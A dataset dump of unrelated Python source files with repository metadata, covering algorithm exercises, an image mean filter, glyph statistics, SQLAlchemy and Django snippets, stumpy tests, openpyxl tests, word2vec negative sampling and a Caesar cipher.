params = [('node.session.auth.authmethod', node_auth), ('node.session.auth.username', node_user), ('node.session.auth.password', node_pass)]
for (name, value) in params:
cmd = ('%s --mode node --targetname %s --op=update --name %s --value %s' % (iscsiadm_cmd, target, name, value))
(rc, out, err) = module.run_command(cmd)
if (rc > 0):
module.fail_json(cmd=cmd, rc=rc, msg=err)
cmd = ('%s --mode node --targetname %s --login' % (iscsiadm_cmd, target))
(rc, out, err) = module.run_command(cmd)
if (rc > 0):
module.fail_json(cmd=cmd, rc=rc, msg=err) | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
c2a810bd301d8844f561beed00989c879eb6d363 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02787/s385554448.py | eb0de844cf83ff51298317f61169298255d1ec6e | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | H,N = map(int,input().split())
inf = 1000000000
dp = [inf for _ in range(20001)]
magics = []
dp[0] = 0
for i in range(N):
magic = list(map(int,input().split()))
magics.append(magic)
for j in range(10001):
for k in magics:
dp[j+k[0]] = min(dp[j]+k[1],dp[j+k[0]])
ans = dp[H:]
print(min(ans)) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
980d5b518857f99a7f02371be9dd4c0741d704b7 | e53b7bbcea1a6f06175a9f14e31d5725fe80e804 | /Question_100/Q11_MeanFilter.py | a8d91f259b3b5bae65693816b60b3a60b2e928ac | [] | no_license | Zpadger/ObjectDetection | 5777c8d78c71dca1af6bccf25b01288dca7100c3 | aa0193a38f3d5c3a318501c3a59e89b73d3e244b | refs/heads/master | 2020-08-16T02:58:45.412713 | 2019-12-14T08:18:51 | 2019-12-14T08:18:51 | 215,446,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | #均值滤波
import cv2
import numpy as np
#read image
img=cv2.imread("imori.jpg")
h,w,c=img.shape
#mean filter
K_size=3
#zero padding
pad=K_size//2
out=np.zeros((h+pad*2,w+pad*2,c),dtype=np.float)
out[pad:pad+h,pad:pad+w]=img.copy().astype(np.float)
tmp=out.copy()
for y in range(h):
for x in range(w):
for c in range(c):
out[pad+y,pad+x,c]=np.mean(tmp[y:y+K_size,x:x+K_size,c]) #取所有元素平均值
out=out[pad:pad+h,pad:pad+w].astype(np.uint8)
#save result
cv2.imwrite("out.jpg",out)
cv2.imshow("result",out)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"noreply@github.com"
] | Zpadger.noreply@github.com |
9534e203e71c3a4144e688ecb9c1a247d5e1c057 | f7d28900c8b49748d7b31f3b8dd384042f07fb36 | /misc/glp_stats/collect_glyph_stats.py | 3fd8c44a1fbb977f719fa9b026e673da5d53f1e9 | [] | no_license | TeluguOCR/datagen_initio | 0f2f4823a08bca24a1012fbd0508cdf12ed01dc1 | f405e91f66c770efa6ae94a71430fcec6bae449f | refs/heads/master | 2021-01-10T15:12:45.431308 | 2015-12-06T00:24:02 | 2015-12-06T00:24:02 | 47,477,987 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,080 | py | #! /usr/bin/python
# -*- coding: utf-8 -*-
from PIL import Image
import sys, os, re
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' <Directory>/ \n'
'This Program finds the stats of images of each glyph class'
'Directory is location of the directories containing image files for each glyph')
sys.exit()
dirs_dir = sys.argv[1]
if dirs_dir[-1] != '/':
dirs_dir += '/'
# Akshar_IT_4004018_-5_-28_-4_-27_-3_-26_-6_-29
# Font_Style_ID_T_B_T_B*
def SplitFileName(filename):
m = re.match('(.+?)_(..)_.+?(_.+_.+).tif', filename)
font = m.group(1)
style = m.group(2)
try:
dtbs = map(int, m.group(3).split('_')[1:])
except ValueError:
print filename
dtbs = []
dtbpairs = [(dtbs[i], dtbs[i+1]) for i in range(0, len(dtbs), 2)]
return font, style, dtbpairs
out_file = open('/tmp/' + dirs_dir[:-1].replace("/","_") + ".csv", 'w')
out_file.write("char font style wd ht xht normtop normbot normwd normht\n")
out_dir = '/tmp/avgs/'
if not os.path.exists(out_dir): os.makedirs(out_dir)
NMXHT = 16 # This is the normalised height of the letter x (or ja in Telugu)
NMTOP = int(1.1 * NMXHT)
NMBOT = int(1.3 * NMXHT)
NMWID = 5 * NMXHT
NMHIT = NMTOP + NMXHT + NMBOT
idir = 0
for dirpath, dirnames, filenames in os.walk(dirs_dir):
print idir, dirpath
idir += 1
big_im = Image.new("L", (NMWID, NMHIT), "white")
big_im.load()
char = os.path.basename(dirpath)
nimgs = 0
for filename in filenames:
# Sanity Checks and open
if filename[-4:] != '.tif':
print filename
continue
try:
full_path = os.path.join(dirpath, filename)
except NameError:
print dirpath, filename
raise
# Open image and process
im = Image.open(full_path)
wd, ht = im.size
font, style, dtbpairs = SplitFileName(filename)
for dt, db in dtbpairs:
xht = dt + ht - db
scalef = float(NMXHT)/xht
normtop = int(scalef * dt)
normbot = int(scalef * db) + NMXHT
normwd = int(scalef * wd)
normht = int(scalef * ht)
# Write the stats to a file
line = " ".join(map(str, (char, font, style, wd, ht, xht, normtop, normbot, normwd, normht)))
out_file.write(line+"\n")
break
# Scale and blend to get average
#print nimgs
try:
nimgs = nimgs + 1
im.load()
im = im.convert('L')
im = im.resize((normwd, normht))
im2 = Image.new("L", (NMWID, NMHIT), "white")
im2.load()
im2.paste(im, (0, NMTOP + normtop))
im2.load()
big_im = Image.blend(big_im, im2, 1./nimgs)
except:
raise
print char, nimgs, big_im.size, im2.size
continue
try:
big_im.save(out_dir + char + '.tif', 'TIFF')
except:
pass
out_file.close()
| [
"rakeshvar@gmail.com"
] | rakeshvar@gmail.com |
0ffce78daacdd1e2459e140c917feb0bfcac0095 | bd71b063f13958e07c9e16cd171d3fc0e1c58e4d | /0x0F-python-object_relational_mapping/11-model_state_insert.py | 293b9e47a1719bc9fa3f2594d981cfa01588d16b | [] | no_license | feliciahsieh/holbertonschool-higher_level_programming | 2aecd291f85fe69ab11331bb2d5372c6d67e1af6 | 017e8b87f9d8967b55ccc68ed30921572d4ddb65 | refs/heads/master | 2021-01-01T20:46:36.901665 | 2019-04-10T18:24:59 | 2019-04-10T18:24:59 | 98,931,138 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 774 | py | #!/usr/bin/python3
"""
Add the State object Louisiana to database hbtn_0e_6_usa
"""
import sys
from model_state import Base, State
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
if __name__ == "__main__":
Base = declarative_base()
engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(
sys.argv[1], sys.argv[2], sys.argv[3]))
Session = sessionmaker(bind=engine)
session = Session()
newState = State(name='Louisiana')
session.add(newState)
session.commit()
myState = session.query(State).filter(State.name == 'Louisiana').first()
print("{}".format(myState.id))
session.close()
| [
"felicia@tixwriteoff.com"
] | felicia@tixwriteoff.com |
a1df8dd1d107a12098b59d231076994ca9958a2d | 16807220b95bf9a559b97ec0de16665ff31823cb | /lcd/screens/exitscreen.py | 52556eede378c20732b65cfc92504200ed9657d1 | [
"BSD-3-Clause"
] | permissive | cuauv/software | 7263df296e01710cb414d340d8807d773c3d8e23 | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | refs/heads/master | 2021-12-22T07:54:02.002091 | 2021-11-18T01:26:12 | 2021-11-18T02:37:55 | 46,245,987 | 76 | 34 | null | 2016-08-03T05:31:00 | 2015-11-16T02:02:36 | C++ | UTF-8 | Python | false | false | 506 | py | import cairo
from screen import Screen
class ExitScreen(Screen):
def get_name(self):
return "exit"
def draw(self, cr):
cr.set_source_rgb(1.0, 0, 0)
cr.select_font_face("FreeSans", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
cr.set_font_size(150)
cr.move_to(10, 150)
cr.show_text("Bye!")
cr.set_source_rgb(1.0, 1.0, 1.0)
cr.set_font_size(25)
cr.move_to(15, 230)
cr.show_text("Please wait for system halt.")
| [
"leader@cuauv.org"
] | leader@cuauv.org |
32661b4325599ee456d1c452634fb18c9f48db6e | 62a5beed83b968fb5b2082a453744bb0fe79f3f2 | /ch04/negative_sampling_layer.py | 4bef31b3c270418dcf048aabbbadfc7483bdc585 | [] | no_license | show2214/deep-learning-from-scratch-2 | 05c8515f7c00947387661a05005f2fd00cb0543b | 2deb28e68d6e0281aebf2df03c619299591d0660 | refs/heads/master | 2023-08-09T12:40:26.877054 | 2021-09-15T04:43:42 | 2021-09-15T04:43:42 | 403,802,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,402 | py | import sys
sys.path.append('..')
from common.np import * # import numpy as np
from common.layers import Embedding, SigmoidWithLoss
import collections
class EmbeddingDot:
def __init__(self, W):
self.embed = Embedding(W)
self.params = self.embed.params
self.grads = self.embed.grads
self.cache = None
def forward(self, h, idx):
target_W = self.embed.forward(idx)
out = np.sum(target_W * h, axis=1)
self.cache = (h, target_W)
return out
def backward(self, dout):
h, target_W = self.cache
dout = dout.reshape(dout.shape[0], 1)
dtarget_W = dout * h
self.embed.backward(dtarget_W)
dh = dout * target_W
return dh
class UnigramSampler:
def __init__(self, corpus, power, sample_size):
self.sample_size = sample_size
self.vocab_size = None
self.word_p = None
counts = collections.Counter()
for word_id in corpus:
counts[word_id] += 1
vocab_size = len(counts)
self.vocab_size = vocab_size
self.word_p = np.zeros(vocab_size)
for i in range(vocab_size):
self.word_p[i] = counts[i]
self.word_p = np.power(self.word_p, power)
self.word_p /= np.sum(self.word_p)
def get_negative_sample(self, target):
batch_size = target.shape[0]
if not GPU:
negative_sample = np.zeros((batch_size, self.sample_size), dtype=np.int32)
for i in range(batch_size):
p = self.word_p.copy()
target_idx = target[i]
p[target_idx] = 0
p /= p.sum()
negative_sample[i, :] = np.random.choice(self.vocab_size, size=self.sample_size, replace=False, p=p)
else:
negative_sample = np.random.choice(self.vocab_size, size=(batch_size, self.sample_size),
replace=True, p=self.word_p)
return negative_sample
class NegativeSamplingLoss:
def __init__(self, W, corpus, power=0.75, sample_size=5):
self.sample_size = sample_size
self.sampler = UnigramSampler(corpus, power, sample_size)
self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
self.params, self.grads = [], []
for layer in self.embed_dot_layers:
self.params += layer.params
self.grads += layer.grads
def forward(self, h, target):
batch_size = target.shape[0]
negative_sample = self.sampler.get_negative_sample(target)
score = self.embed_dot_layers[0].forward(h, target)
correct_label = np.ones(batch_size, dtype=np.int32)
loss = self.loss_layers[0].forward(score, correct_label)
negative_label = np.zeros(batch_size, dtype=np.int32)
for i in range(self.sample_size):
negative_target = negative_sample[:, i]
score = self.embed_dot_layers[1 + i].forward(h, negative_target)
loss += self.loss_layers[1 + i].forward(score, negative_label)
return loss
def backward(self, dout=1):
dh = 0
for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
dscore = l0.backward(dout)
dh += l1.backward(dscore)
return dh | [
"show2214@icloud.com"
] | show2214@icloud.com |
6cf60993a32a3c90768425762696112fcbe27ec0 | 95b8130d908c79f8192c6813fee6220ccb05c5c3 | /tests/test_stumped.py | c4744d728110eaecf1b9f334aa45e69bec1187bc | [
"BSD-3-Clause"
] | permissive | canslove/stumpy | 4ac96d44eeef24f8e2add3dd0bab0788cb117d32 | 2c1a9ace0d7241435d1e5c6578e7dca45e541108 | refs/heads/master | 2020-06-01T06:16:22.238904 | 2019-06-06T18:50:22 | 2019-06-06T18:50:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,692 | py | import numpy as np
import numpy.testing as npt
import pandas as pd
from stumpy import stumped, core
from dask.distributed import Client, LocalCluster
import pytest
import warnings
@pytest.fixture(scope="module")
def dask_client():
cluster = LocalCluster(n_workers=None, threads_per_worker=2)
client = Client(cluster)
yield client
# teardown
client.close()
cluster.close()
def naive_mass(Q, T, m, trivial_idx=None, excl_zone=0, ignore_trivial=False):
D = np.linalg.norm(
core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1
)
if ignore_trivial:
start = max(0, trivial_idx - excl_zone)
stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone)
D[start:stop] = np.inf
I = np.argmin(D)
P = D[I]
# Get left and right matrix profiles for self-joins
if ignore_trivial and trivial_idx > 0:
PL = np.inf
IL = -1
for i in range(trivial_idx):
if D[i] < PL:
IL = i
PL = D[i]
if start <= IL <= stop:
IL = -1
else:
IL = -1
if ignore_trivial and trivial_idx + 1 < D.shape[0]:
PR = np.inf
IR = -1
for i in range(trivial_idx + 1, D.shape[0]):
if D[i] < PR:
IR = i
PR = D[i]
if start <= IR <= stop:
IR = -1
else:
IR = -1
return P, I, IL, IR
def replace_inf(x, value=0):
x[x == np.inf] = value
x[x == -np.inf] = value
return
test_data = [
(
np.array([9, 8100, -60, 7], dtype=np.float64),
np.array([584, -11, 23, 79, 1001, 0, -19], dtype=np.float64),
),
(
np.random.uniform(-1000, 1000, [8]).astype(np.float64),
np.random.uniform(-1000, 1000, [64]).astype(np.float64),
),
]
@pytest.mark.filterwarnings("ignore:numpy.dtype size changed")
@pytest.mark.filterwarnings("ignore:numpy.ufunc size changed")
@pytest.mark.filterwarnings("ignore:numpy.ndarray size changed")
@pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning")
@pytest.mark.parametrize("T_A, T_B", test_data)
def test_stumped_self_join(T_A, T_B, dask_client):
dask_client.restart()
m = 3
zone = int(np.ceil(m / 4))
left = np.array(
[
naive_mass(Q, T_B, m, i, zone, True)
for i, Q in enumerate(core.rolling_window(T_B, m))
],
dtype=object,
)
right = stumped(dask_client, T_B, m, ignore_trivial=True)
replace_inf(left)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
right = stumped(dask_client, pd.Series(T_B), m, ignore_trivial=True)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
@pytest.mark.filterwarnings("ignore:numpy.dtype size changed")
@pytest.mark.filterwarnings("ignore:numpy.ufunc size changed")
@pytest.mark.filterwarnings("ignore:numpy.ndarray size changed")
@pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning")
@pytest.mark.parametrize("T_A, T_B", test_data)
def test_stumped_A_B_join(T_A, T_B, dask_client):
dask_client.restart()
m = 3
left = np.array(
[naive_mass(Q, T_A, m) for Q in core.rolling_window(T_B, m)], dtype=object
)
right = stumped(dask_client, T_A, m, T_B, ignore_trivial=False)
replace_inf(left)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
right = stumped(
dask_client, pd.Series(T_A), m, pd.Series(T_B), ignore_trivial=False
)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
| [
"seanmylaw@gmail.com"
] | seanmylaw@gmail.com |
78fb6dfd977597e0296dba31f5b7f924af76d0ee | 32997e6a8607358765254ea81d2f867269ae2b35 | /09-problems/ed_002_max_cpu_load.py | d7ce673b607b109f2ba41cecf865ebb19e7f70fa | [
"MIT"
] | permissive | aman-singh7/training.computerscience.algorithms-datastructures | 0ace578ebcec13c5293b4d4dccdaa7634788604d | a4e1d1973b091589690fd2efc5dcb3c1a4df6c4c | refs/heads/master | 2023-06-09T12:27:55.569254 | 2021-06-29T20:16:37 | 2021-06-29T20:16:37 | 401,133,325 | 1 | 0 | MIT | 2021-08-29T20:12:50 | 2021-08-29T20:12:49 | null | UTF-8 | Python | false | false | 2,706 | py | """
1. Problem Summary / Clarifications / TDD:
[[1,4,3], [2,5,4], [7,9,6]]: 7
[[6,7,10], [2,4,11], [8,12,15]]: 15
[[1,4,2], [2,4,1], [3,6,5]]: 8
Output: 8
2. Intuition:
1. Store store current end time and current load
2. Compute current load: current load + curr_job.cpu_load - all previous job cpu load which job.end < curr_job.start
3. Compute the max cpu load
3. Implementation:
4. Tests:
Edge case 1: []: 0
Edge case 2: [[0,2,3]]: 3
Edge case 3: [[0,2,3],[0,2,3]]: 6
Spacial case: [[0,20,3],[1,21,3],[2,22,3],[3,23,3]]: 12
Cases above
5: Complexity Analysis:
Time Complexity: O(nlogn) because of the sorting and heappush/heappop
Space Complexity: O(n) when max(jobs.start.values) < min(jobs.end.values)
"""
import heapq
class Solution:
def __init__(self):
self._start = 0
self._end = 1
self._cpu_load = 2
def find_max_cpu_load(self, jobs):
# 1. Sort all job by job start time
jobs.sort(key=lambda job: job[self._start])
job_end_time_heap = []
# 2. Compute cpu max load
cpu_max_load = 0
cpu_curr_load = 0
for job in jobs:
# 2.1. Deduce all previous job cpu loads
while job_end_time_heap and job[self._start] > job_end_time_heap[0][0]:
cpu_curr_load -= job_end_time_heap[0][1]
heapq.heappop(job_end_time_heap)
# 2.2. Add current job cpu load
cpu_curr_load += job[self._cpu_load]
# 2.3. Push current job cpu load
heapq.heappush(job_end_time_heap, (job[self._end], job[self._cpu_load]))
cpu_max_load = max(cpu_max_load, cpu_curr_load)
return cpu_max_load
if __name__ == '__main__':
max_cpu_load_solution = Solution()
# Edge Cases:
print('[]: ', max_cpu_load_solution.find_max_cpu_load([]))
print('[[0,2,3]]: ', max_cpu_load_solution.find_max_cpu_load([[0,2,3]]))
print('[[0,2,3],[0,2,3]]: ', max_cpu_load_solution.find_max_cpu_load([[0,2,3],[0,2,3]]))
# Spacial Cases:
print('[[0,20,3],[1,21,3],[2,22,3],[3,23,3]]: ', max_cpu_load_solution.find_max_cpu_load([[0,20,3],[1,21,3],[2,22,3],[3,23,3]]))
# Test Cases:
print('[[1,4,3],[2,5,4],[7,9,6]]: ', max_cpu_load_solution.find_max_cpu_load([[1,4,3],[2,5,4],[7,9,6]]))
print('[[6,7,10],[2,4,11],[8,12,15]]: ', max_cpu_load_solution.find_max_cpu_load([[6,7,10],[2,4,11],[8,12,15]]))
print('[[1,4,2],[2,4,1],[3,6,5]]: ', max_cpu_load_solution.find_max_cpu_load([[1,4,2],[2,4,1],[3,6,5]]))
| [
"mamid1706@hotmail.fr"
] | mamid1706@hotmail.fr |
19eeeb6f65f752d9650f12b7db8cbd7fd4e52021 | 0fac73e70eeb8e3b8635de8a4eaba1197cd42641 | /shop/migrations/0009_auto_20161218_1423.py | 6c991c55ff7db73b3fcce1e6b9e86531343964e6 | [] | no_license | gauraviit1/myshop_aws | 0e6c9d822cbbc6505eb7c7a71654d34591e7b168 | 261b296d79cfdf8fa4cb9105b4e2fe70e864f6a6 | refs/heads/master | 2021-01-19T13:44:12.977253 | 2017-03-03T07:52:58 | 2017-03-03T07:52:58 | 82,444,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-12-18 08:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0008_auto_20161218_1418'),
]
operations = [
migrations.AlterField(
model_name='productattribute',
name='size',
field=models.CharField(blank=True, max_length=2),
),
migrations.AlterField(
model_name='productattribute',
name='waist_size',
field=models.PositiveSmallIntegerField(blank=True),
),
]
| [
"mcjail.shi.hp@gmail.com"
] | mcjail.shi.hp@gmail.com |
cf7a6073c70b6641ce1642c80b71357c98691c98 | 441f0b4b4f2016ace7bed37431779b3352b9c2e4 | /YouTube Ignorancia Zero/Ferramentas de Sistema/105 - Ferramentas de Sistema I: Básico módulo sys/105.py | 00f7f36c467e269506283635dc65f9c6e2a2bbff | [] | no_license | AlexGalhardo/Learning-Python | 936b2eae814d148b0b3b77cc76cf81b45fbb4a02 | b710952101a0409f585ba975e2854bf0e0286ac7 | refs/heads/master | 2020-05-19T23:32:49.285710 | 2019-09-04T17:37:27 | 2019-09-04T17:37:27 | 134,312,273 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py |
##### Modulo sys #####
"""
platform = devolve a plataforma de execução
path = lista com todas as pastas ligadas ao programa
exit([args]) = termina a execução de um programa
modules = todos os módulos carregados
exc_info = tupla que contem a ultima excessão levantada
"""
import sys
#if 'win' in sys.platform:
# import winsound
#print(sys.modules)
#try:
# raise IndexError
#except:
# print(sys.exc_info())
| [
"aleexgvieira@gmail.com"
] | aleexgvieira@gmail.com |
85c31e40b493df1d537fa5c1d68f81571561acf1 | 6cc35793f2bac664d2ab9273911b37a256933418 | /Aula18/1.py | 8a83b57ae03116a3b36484bd55697b3268cfeffc | [] | no_license | MarcianoPazinatto/TrabalhosdePython | a6d8384b3586d5619654a70c73a978ce9def9b8a | 74ccf0541de426ad795700234643218953d7b0a0 | refs/heads/master | 2020-09-05T21:28:13.264266 | 2020-03-10T13:40:48 | 2020-03-10T13:40:48 | 220,218,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | # Aula 18 - 03-11-2019
# Exercicios para lista simples
# Dada a seguinte lista, resolva os seguintes questões:
lista = [10, 20, 'amor', 'abacaxi', 80, 'Abioluz', 'Cachorro grande é de arrasar']
print('1: Usando a indexação, escreva na tela a palavra abacaxi')
print(lista[3])
##################################################################################
print('\n\n')
print('2: Usando a indexação, escreva na tela os seguintes dados: 20, amor, abacaxi')
print(lista[1:4])
##################################################################################
print('\n\n')
print('3: Usando a indexação, escreva na tela uma lista com dados de 20 até Abioluz')
print(lista[1:6])
##################################################################################
print('\n\n')
print('4: Usando a indexação, escreva na tela uma lista com os seguintes dados:'
'\nCachorro grande é de arrasar, Abioluz, 80, abacaxi, amor, 20, 10')
print(lista[::-1])
##################################################################################
print('\n\n')
print('5: Usando o f-string e a indexação escreva na tela os seguintes dados:'
'\n { abacaxi } é muito bom, sinto muito { amor } quando eu chupo { 80 }" deles.')
print(f'{ lista[3]} é muito bom, sinto muito { lista[2] } quando eu chupo { lista[4]} deles.')
##################################################################################
print('\n\n')
print('6: Usando a indexação, escreva na tela os seguintes dados:'
'\n10, amor, 80, Cachorro grande é de arrasar')
print(lista[::2])
##################################################################################
print('\n\n')
print('7: Usando o f-string e a indexação escreva na tela os seguintes dados:'
'Abioluz - abacaxi - 10 - Cachorro grande é de arrasar - 20 - 80' )
print(f'{lista[5]}-{lista[3]}-{lista[0]}-{lista[6]}-{lista[1]}-{lista[4]}')
##################################################################################
print('\n\n')
print('8: Usando o f-string e a indexação escreva na tela os seguintes dados:'
'\namor - 10 - 10 - abacaxi - Cachorro grande é de arrasar - Abioluz - 10 - 20')
print(f'{lista[2]}-{lista[0]}-{lista[0]}-{lista[3]}-{lista[6]}-{lista[5]}-{lista[0]}-{lista[1]}')
##################################################################################
print('\n\n')
print('9: Usando a indexação, escreva na tela uma lista com dados de 10 até 80')
print(lista[0:4])
##################################################################################
print('\n\n')
print('10: Usando a indexação, escreva na tela os seguintes dados:'
'\n10, abacaxi, Cachorro grande é de arrasar')
print(lista[::3]) | [
"marciano.et@hotmail.com"
] | marciano.et@hotmail.com |
3873bba1c404a7e7984c0597b55e018dc11f41f4 | 0bb8e1d97434d079d02f2645b54a4489bee91264 | /openpyxl2/drawing/tests/test_properties.py | 4823cbedbad3cc0ed424805f97df27bcf1649e43 | [
"MIT"
] | permissive | j5int/openpyxl2 | 1313dba978179161acfc005e147ed7eed34c249a | 3c82567c33d6cad5b0b26eea97da7bb39ba7f4c8 | refs/heads/master | 2020-04-05T12:50:02.977837 | 2018-11-09T11:55:31 | 2018-11-09T11:55:31 | 156,882,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,858 | py | from __future__ import absolute_import
# Copyright (c) 2010-2018 openpyxl
import pytest
from openpyxl2.xml.functions import fromstring, tostring
from openpyxl2.tests.helper import compare_xml
@pytest.fixture
def NonVisualDrawingProps():
from ..properties import NonVisualDrawingProps
return NonVisualDrawingProps
class TestNonVisualDrawingProps:
def test_ctor(self, NonVisualDrawingProps):
graphic = NonVisualDrawingProps(id=2, name="Chart 1")
xml = tostring(graphic.to_tree())
expected = """
<cNvPr id="2" name="Chart 1"></cNvPr>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, NonVisualDrawingProps):
src = """
<cNvPr id="3" name="Chart 2"></cNvPr>
"""
node = fromstring(src)
graphic = NonVisualDrawingProps.from_tree(node)
assert graphic == NonVisualDrawingProps(id=3, name="Chart 2")
@pytest.fixture
def NonVisualGroupDrawingShapeProps():
from ..properties import NonVisualGroupDrawingShapeProps
return NonVisualGroupDrawingShapeProps
class TestNonVisualGroupDrawingShapeProps:
def test_ctor(self, NonVisualGroupDrawingShapeProps):
props = NonVisualGroupDrawingShapeProps()
xml = tostring(props.to_tree())
expected = """
<cNvGrpSpPr />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, NonVisualGroupDrawingShapeProps):
src = """
<cNvGrpSpPr />
"""
node = fromstring(src)
props = NonVisualGroupDrawingShapeProps.from_tree(node)
assert props == NonVisualGroupDrawingShapeProps()
@pytest.fixture
def NonVisualGroupShape():
from ..properties import NonVisualGroupShape
return NonVisualGroupShape
class TestNonVisualGroupShape:
def test_ctor(self, NonVisualGroupShape, NonVisualDrawingProps, NonVisualGroupDrawingShapeProps):
props = NonVisualGroupShape(
cNvPr=NonVisualDrawingProps(id=2208, name="Group 1"),
cNvGrpSpPr=NonVisualGroupDrawingShapeProps()
)
xml = tostring(props.to_tree())
expected = """
<nvGrpSpPr>
<cNvPr id="2208" name="Group 1" />
<cNvGrpSpPr />
</nvGrpSpPr>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, NonVisualGroupShape, NonVisualDrawingProps, NonVisualGroupDrawingShapeProps):
src = """
<nvGrpSpPr>
<cNvPr id="2208" name="Group 1" />
<cNvGrpSpPr />
</nvGrpSpPr>
"""
node = fromstring(src)
props = NonVisualGroupShape.from_tree(node)
assert props == NonVisualGroupShape(
cNvPr=NonVisualDrawingProps(id=2208, name="Group 1"),
cNvGrpSpPr=NonVisualGroupDrawingShapeProps()
)
@pytest.fixture
def GroupLocking():
from ..properties import GroupLocking
return GroupLocking
class TestGroupLocking:
def test_ctor(self, GroupLocking):
lock = GroupLocking()
xml = tostring(lock.to_tree())
expected = """
<grpSpLocks xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GroupLocking):
src = """
<grpSpLocks />
"""
node = fromstring(src)
lock = GroupLocking.from_tree(node)
assert lock == GroupLocking()
@pytest.fixture
def GroupShapeProperties():
from ..properties import GroupShapeProperties
return GroupShapeProperties
from ..geometry import Point2D, PositiveSize2D, GroupTransform2D
class TestGroupShapeProperties:
def test_ctor(self, GroupShapeProperties):
xfrm = GroupTransform2D(
off=Point2D(x=2222500, y=0),
ext=PositiveSize2D(cx=2806700, cy=825500),
chOff=Point2D(x=303, y=0),
chExt=PositiveSize2D(cx=321, cy=111),
)
props = GroupShapeProperties(bwMode="auto", xfrm=xfrm)
xml = tostring(props.to_tree())
expected = """
<grpSpPr bwMode="auto" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
<a:xfrm rot="0">
<a:off x="2222500" y="0"/>
<a:ext cx="2806700" cy="825500"/>
<a:chOff x="303" y="0"/>
<a:chExt cx="321" cy="111"/>
</a:xfrm>
</grpSpPr>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GroupShapeProperties):
src = """
<grpSpPr />
"""
node = fromstring(src)
fut = GroupShapeProperties.from_tree(node)
assert fut == GroupShapeProperties()
| [
"charlie.clark@clark-consulting.eu"
] | charlie.clark@clark-consulting.eu |
3c913a3354033d6adee53f32448dc623a7fb194f | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /Es985FEDzEQ2tkM75_17.py | e8efaf329556cd3f9c55aca68288ccd6ac325fca | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py |
def caesar_cipher(txt, key):
return ''.join(chr(65+(ord(c)-65+key)%26) if c.isupper() else\
chr(97+(ord(c)-97+key)%26) if c.islower() else c for c in txt)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
2fd9398df9b19b15aae4de2492f5fc6f7afa17cd | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_206/1478.py | 364c4fc8e1d4c920705b9f693c1fbc451d1e49f2 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | t = int (input() )
for i in range(t):
d,n = map(int,input().split() )
horse=[]
for j in range(n):
temp1,temp2= map(int,input().split() )
horse.append([temp1,temp2])
ans=0
for j in range(n):
need = (d-horse[j][0])/horse[j][1]
if(need > ans):
ans=need
print("Case #"+str(i+1)+": "+"{:.12f}".format(d/ans) )
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
